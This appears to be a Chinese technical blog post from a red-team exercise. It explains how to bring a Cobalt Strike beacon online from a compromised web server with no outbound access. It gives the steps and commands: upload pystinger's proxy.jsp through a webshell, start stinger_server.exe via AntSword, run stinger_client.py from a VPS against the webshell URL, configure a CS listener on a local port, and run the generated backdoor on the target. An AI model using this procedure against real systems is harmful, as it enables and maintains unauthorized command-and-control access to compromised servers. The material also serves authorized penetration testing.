pystinger实现不出网情况下,上线CS的方式

文章讲述了在目标服务器不出网的情况下,如何通过pystinger工具进行内网穿透。首先,将proxy.jsp上传至目标服务器并确保可访问,然后使用AntSword启动stinger_server.exe。在互联网端,通过python3运行stinger_client.py建立连接。最后,配置CS监听器以实现C2通信,创建并运行后门。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

某hw过程中遇到如下情况:

获取到webshell,目标服务器不出网

目标机:内网地址,端口映射到公网ip
vps:
在这里插入图片描述

pystinger地址:

https://github.com/FunnyWolf/pystinger
python3 -m pip install  -r  requirement.txt

目标机操作:

1、proxy.jsp上传到目标服务器,确保http://example.com:8080/proxy.jsp可以访问
,页面返回UTF-8
2、stinger_server.exe上传到目标服务器,
AntSword运行cmdstart D:/XXX/stinger_server.exe启动pystinger-server
不要D:/xxx/singer_server.exe直接运行,会造成TCP断开

互联网微PS操作:

3、python3 ./stinger_client.py -w 
http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

在这里插入图片描述
CS监听器配置

HTTP Hosts:127.0.0.1
HTTP Hosts(stager):目标及内网ip
HTTP Port(C2):60020

在这里插入图片描述
s生成后门在目标机运行
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值